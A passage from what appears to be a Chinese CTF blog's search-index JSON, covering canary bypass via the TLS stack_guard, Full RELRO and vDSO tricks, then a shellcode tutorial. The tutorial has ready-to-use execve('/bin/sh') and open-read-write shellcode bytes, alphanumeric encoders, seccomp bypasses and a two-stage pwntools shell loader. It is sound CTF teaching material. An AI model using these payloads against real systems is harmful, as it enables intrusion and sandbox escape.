*/ __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32))); void *__padding[8];} tcbhead_t; 0x28的偏移实际上是指向的stack_guard 那么如何确定段选择地址呢,我们知道段寄存器的基地址是不可见的,而且fs/gs可见的数值也不是段选择子而是0,所以在gdb中我们选择pthread_self() 来查看fs的地址,对比上面的结构,我们可以看到此函数其实是返回了结构体自身的地址。 12345pthread_tpthread_self (void){ return (pthread_t) THREAD_SELF;} 在gdb中查看这个地址,发现这个地址实际上在libc的附近。 12p/x (tcbhead_t)*(tcbhead_t *)(pthread_self())p/x (void*)(pthread_self()) 1234567891011121314151617181920212223242526pwndbg> vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x555555554000 0x555555555000 r--p 1000 0 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555555000 0x555555556000 r-xp 1000 1000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555556000 0x555555557000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555557000 0x555555558000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555558000 0x555555559000 rw-p 1000 3000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x7ffff7dc7000 0x7ffff7dc9000 rw-p 2000 0 [anon_7ffff7dc7] 0x7ffff7dc9000 0x7ffff7def000 r--p 26000 0 /usr/lib64/libc.so.6 0x7ffff7def000 0x7ffff7f4c000 r-xp 15d000 26000 /usr/lib64/libc.so.6 0x7ffff7f4c000 0x7ffff7f99000 r--p 4d000 183000 /usr/lib64/libc.so.6 0x7ffff7f99000 0x7ffff7f9d000 r--p 4000 1d0000 /usr/lib64/libc.so.6 0x7ffff7f9d000 0x7ffff7f9f000 rw-p 2000 1d4000 /usr/lib64/libc.so.6 0x7ffff7f9f000 0x7ffff7fa9000 rw-p a000 0 [anon_7ffff7f9f] 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0x7ffff7fca000 0x7ffff7fcb000 r--p 1000 0 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7fcb000 0x7ffff7ff1000 r-xp 26000 1000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ff1000 0x7ffff7ffb000 r--p a000 27000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffb000 0x7ffff7ffd000 r--p 2000 30000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffd000 0x7ffff7fff000 rw-p 2000 32000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 [stack]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg> p/x (void*)(pthread_self())$16 = 0x7ffff7fa8680 如果我们能覆盖stack_guard, 那么相应的,我们就能绕过canary的保护。 但是,显然,正常栈溢出是无法到达这个地址的。然而,在存在子线程栈溢出的情况下,线程栈地址是接近线程fs 寄存器地址的,所以可以通过此来实现覆盖。 bypass Full RELRO 在没有leak函数,并且Full RELRO 的情况下, ret2dl_resolve就无法使用了。 因为got不再可写,partial overwrite也无法再使用。 那么可以找数据移动的gadget将got 表里面的值读入bss段,然后对bss段上的值进行partial overwrite, 或者通过add、sub等gadget拼出目标libc值,再栈迁移到bss段, 就可以ret到lbss段上的libc地址,从而劫持控制流。 vsyscall/vdso vsyscall 和 vdso 都是内核留下的用于加速系统调用的接口,也因此,其根据内核版本的不同而有所不同。 可以随便开一个程序看一下他们各自的加载地址 12345 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall] 先来说vsyscall, 里面实现了三个函数: 0xffffffffff600000, gettimeofday 0xffffffffff600400, time 0xffffffffff600800, getcpu 并且vsyscall 的加载地址是固定的,但是由于其执行有检查,必须从以上三个函数开始的地址来运行,所以也就只能执行以上三个函数,更多的作用是在栈溢出完全无leak时,将此作为gadget滑块,让程序运行到有效libc地址。 不过,在许多发行版中,这个功能已经被裁剪。 vDSO 相对而言灵活很多,他类似与一个共享库,如果你用gdb将其dump下来,会发现他甚至有完整的ELF结构。 然而,其加载地址却会受到随机化的影响,在32位的程序中,这个随机化的偏移是可爆破的程度,然而在64位的系统中,就完全不可能了。 不过在loader在加载过程中会在栈上留下其地址,在所有环境变量的上面一点的偏移,如果存在leak,就可以劫持。 
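这里说的"栈上留下其地址",具体就是位于环境变量指针数组上方的辅助向量(auxv)中的 AT_SYSINFO_EHDR 项,其值即 vDSO 的加载基址。下面是一段读取 /proc/self/auxv 做本机验证的小脚本(仅为示意,假设运行在 Linux x86-64 上):
import struct

AT_SYSINFO_EHDR = 33   # linux/auxvec.h 中的取值,对应项的 value 即 vDSO 基址

with open('/proc/self/auxv', 'rb') as f:
    data = f.read()

# x86-64 上每个 auxv 项是 <type, value> 两个 8 字节,以 AT_NULL(0) 结尾
for i in range(0, len(data), 16):
    a_type, a_val = struct.unpack('<QQ', data[i:i+16])
    if a_type == AT_SYSINFO_EHDR:
        print('vDSO base: %#x' % a_val)
        break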
不过,一个更大的问题的,由于这是内核提供的一个接口,vDSO具体内容随内核版本有所不同,除非你能dump出远程的vDSO,否则很难利用。","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]},{"title":"Pwn.the-Art-of-Shellcode","slug":"Pwn.The-Art-of-Shellcode","date":"2022-07-30T16:00:00.000Z","updated":"2024-02-28T15:02:54.692Z","comments":true,"path":"Pwn.The-Art-of-Shellcode/","link":"","permalink":"https://v3rdant.cn/Pwn.The-Art-of-Shellcode/","excerpt":"Basic 首先给出两个常用shellcode仓库,可以检索需要的shellcode shellcode database exploit-db","text":"Basic 首先给出两个常用shellcode仓库,可以检索需要的shellcode shellcode database exploit-db 接下来给出几个尽可能短的shellcode 12345; excve('/bin/sh','sh',0); rax: 0x3b; rdi: '/bin/sh' ; rsi: 'sh' ; rdx; NULL 最短shellcode 特征与条件 长度为22字节 主要是通过cdq将rdx高位为0,减小了长度,另一种方法是通过mul r/m64指令,实现清空rax和rdx eax 高二位必须为0,一般是满足的 汇编 123456789xor rsi, rsipush rsi mov rdi, 0x68732f2f6e69622fpush rdipush rsp pop rdi mov al, 59 cdq syscall 1234567891048 31 f6 xor rsi, rsi 56 push rsi58 bf 2f 62 69 6e 2f mov rdi, 0x68732f2f6e69622f;2f 73 6857 push rdi54 push rsp 5f pop rdi ;stack pointer to /bin//shb0 3b mov al, 59 ;sys_execve 66 b8 3b 00 mov ax,5999 cdq ;sign extend of eax0f 05 syscall 字节码 1234567// int0x622fbf4856f631480x545768732f2f6e690x050f993bb05f// bytes\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05 orw 特征与条件 长度为0x28字节 主要是通过异或实现了取代了mov减少长度 rsp指向的地址必须是可用的 存在NULL字符 汇编 1234567891011121314// rdx为写入数量mov rdx, 0x200push 0x67616c66mov rdi,rspxor esi,esi #如果本来rsi=0,可以删掉这句mov eax,2syscallmov edi,eaxmov rsi,rspxor eax,eaxsyscallxor edi,2 mov eax,edisyscall 字节码 12345670x6800000200c2c7480x31e7894867616c660x050f00000002b8f60x0fc031e68948c7890x050ff88902f78305\\x48\\xc7\\xc2\\x00\\x02\\x00\\x00\\x68\\x66\\x6c\\x61\\x67\\x48\\x89\\xe7\\x31\\xf6\\xb8\\x02\\x00\\x00\\x00\\x0f\\x05\\x89\\xc7\\x48\\x89\\xe6\\x31\\xc0\\x0f\\x05\\x83\\xf7\\x02\\x89\\xf8\\x0f\\x05 可指定地址orw 123456789101112131415shellcode = """xor rdx,rdxmov dh, 0x2mov rdi,{}xor esi,esi mov eax,2syscallmov rsi,rdimov edi,eaxxor eax,eaxsyscallxor edi,2mov eax,edisyscall""".format(hex(target_addr + 0xb0)) 侧信道爆破 1234567891011121314151617181920212223242526code = asm( """ push 0x67616c66 mov rdi, rsp xor edx, edx xor esi, esi push SYS_open pop rax syscall xor eax, eax push 6 pop rdi push 0x50 pop rdx mov rsi, 0x10100 syscall mov dl, byte ptr [rsi+{}] mov cl, {} cmp cl, dl jz loop mov al,231 syscall loop: jmp loop """.format(offset, ch)) 字符限制 编码工具 ae64 alpha3 Encode x32 alphanumeric shellcode x ✔ Encode x64 alphanumeric shellcode ✔ ✔ Original shellcode can contain zero bytes ✔ x Base address register can contain offset ✔ x Alpha3 限制只能使用字母或者数字 alpha3使用: alpha3需要python2环境,所以先安装python2 12345from pwn import *context.arch='amd64'sc = b"\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x31\\xc0\\xb0\\x3b\\x99\\x0f\\x05"with open("./sc.bin",'wb') as f: f.write(sc) 1python2 ALPHA3.py x64 ascii mixedcase rdx --input="sc.bin" > out.bin 可以选择架构、编码、限制的字符 AE64 AE64可以直接在python中导入,使用相对较为方便且限制较少 12345678910from ae64 import AE64from pwn import *context.arch='amd64'# get bytes format shellcodeshellcode = asm(shellcraft.sh())# get alphanumeric shellcodeenc_shellcode = AE64().encode(shellcode)print(enc_shellcode.decode('latin-1')) 手动绕过 主要是通过sub、add、xor等指令对于非字母数字指令进行加密。 可以先根据限制筛选出受限制后的指令列表,然后根据指令列表进行组合,从而实现绕过。 另一种方法是通过shellcode先实现write读取到shellcode的位置,然后输入新的无限制的 shellcode来完成绕过。 https://nets.ec/Alphanumeric_shellcode 特定位置字符限制 
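对于上面"先用一小段受限 shellcode 把不受限制的第二段读进来"的思路,下面给出一个两段式结构的最小示意:stage1 只负责 read 和跳转,真正发送前仍需用前文的 AE64/alpha3 等工具按题目限制编码;buf_addr、./vuln 以及发送时机都是假设,需按实际交互调整。
from pwn import *
context.arch = 'amd64'

buf_addr  = 0x20230000         # 假设:已知的可执行缓冲区地址,stage1 就放在这里
stage2_at = buf_addr + 0x100   # 约定把第二段读到缓冲区偏移 0x100 处

# stage1:read(0, stage2_at, 0x200) 之后跳过去;发送前还要按字符限制编码
stage1  = asm(shellcraft.read(0, stage2_at, 0x200))
stage1 += asm('mov rax, {}; jmp rax'.format(stage2_at))

# stage2:不受限制的完整 shellcode,例如直接 execve('/bin/sh')
stage2 = asm(shellcraft.sh())

p = process('./vuln')          # 假设的目标程序
p.send(stage1)                 # 实际利用中这里发送的应是编码后的 stage1
sleep(0.5)                     # 等 stage1 开始执行、阻塞在 read 上
p.send(stage2)
p.interactive()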
在最近的*CTF中存在一个用浮点数输入字符,并对浮点数做限制写shellcode的题目,实际上是限制了每八位需要有两位是特定字符,这里给出两种绕过思路: 1234mov rcx, im64mov rcx, im32mov ecx, im32mov cl, im16 这里im是可以由我们自由控制的立即数,因此我们可以通过插入这些无关指令填充来绕过限制,上面这些指令涵盖了3、4、5字节,可以灵活插入来达到需要的效果 1jmp short 通过jmp短跳转直接跳过中间指令,从而绕过限制 jmp指令本身只有两个字节,更为灵活。 对于orw的限制 如果程序还对orw等系统调用作出了限制呢? w的限制还好说,可以通过侧信道leak出flag,而如果禁用了open,orw就 很难进行下去了。 但是还有一种方法。 利用32位调用绕过orw x86与x64的syscall number是不一样的,如果能够跳转到32位执行相应的shellcode,就可一绕过限制。 x86 sys_number | sys_number | | | | | |—|—|—|—|—|—| |3|read|0x03|unsigned int fd|char *buf|size_t count| |4|write|0x04|unsigned int fd|const char *buf|size_t count| |5|open|0x05|const char *filename|int flags|umode_t mode| 而程序是由32位还是64位执行是由cs寄存器决定的,而retfq指令可以对其作出更改,从而切换寄存器状态,所以可以由此实现orw。 值得注意的是, 对于32位程序, 由于kernel 也要对其作出相应支持, 所以内核代码中有一个操作系统层面的arch判断, personality, 这会影响mmap之类的操作 x32 ABI x32 ABI 是一个应用程序二进制接口 (ABI),也是 Linux 内核的接口之一。 x32 ABI 在 Intel 和 AMD 64 位硬件上提供 32 位整数、长整数和指针。 可以通过 查看内核源代码 unistd_x32.h 查看 1cat /usr/src/kernels/6.4.7-200.fc38.x86_64/arch/x86/include/generated/uapi/asm/unistd_x32.h 123456#ifndef _UAPI_ASM_UNISTD_X32_H #define _UAPI_ASM_UNISTD_X32_H #define __NR_read (__X32_SYSCALL_BIT + 0) #define __NR_write (__X32_SYSCALL_BIT + 1) #define __NR_open (__X32_SYSCALL_BIT + 2) #define __NR_close (__X32_SYSCALL_BIT + 3) 即可以通过0x40000000+syscall_number 来调用一些系统调用。所以可以绕过对syscall的限制。 不过这个特性似乎在大多数发行版中不受支持。 io_uring io_uring 本身可以实现所有orw乃至socket连接操作, 在linux5.xx最少需要mmap和 io_uring_setup 两个syscall, 之后增加了 IORING_SETUP_NOMMAP 则可以只用一个syscall来实现orw 对于syscall指令的过滤 vdso sysenter int 80 tricks 对于一些题目,对shellcode的检查用到了strlen,那么可以通过先使用一些存在NULL截断的指令,从而使得后面的字符串绕过限制。 在无法获取shellcode运行地址时,可以运行syscall,运行后,rcx会被改写为下一条指令的地址。在32位程序中,还可以通过call指令获取将运行地址压入栈中,在64位地址中,可以直接通过 lea rax, [rip] 来获取rip地址 对于需要libc地址的程序,可以考虑通过xmm寄存器获得libc相关地址","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]}],"categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"},{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/categories/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"},{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"},{"name":"Coding","slug":"Coding","permalink":"https://v3rdant.cn/tags/Coding/"},{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"},{"name":"io_uring","slug":"io-uring","permalink":"https://v3rdant.cn/tags/io-uring/"},{"name":"shellcode","slug":"shellcode","permalink":"https://v3rdant.cn/tags/shellcode/"},{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]}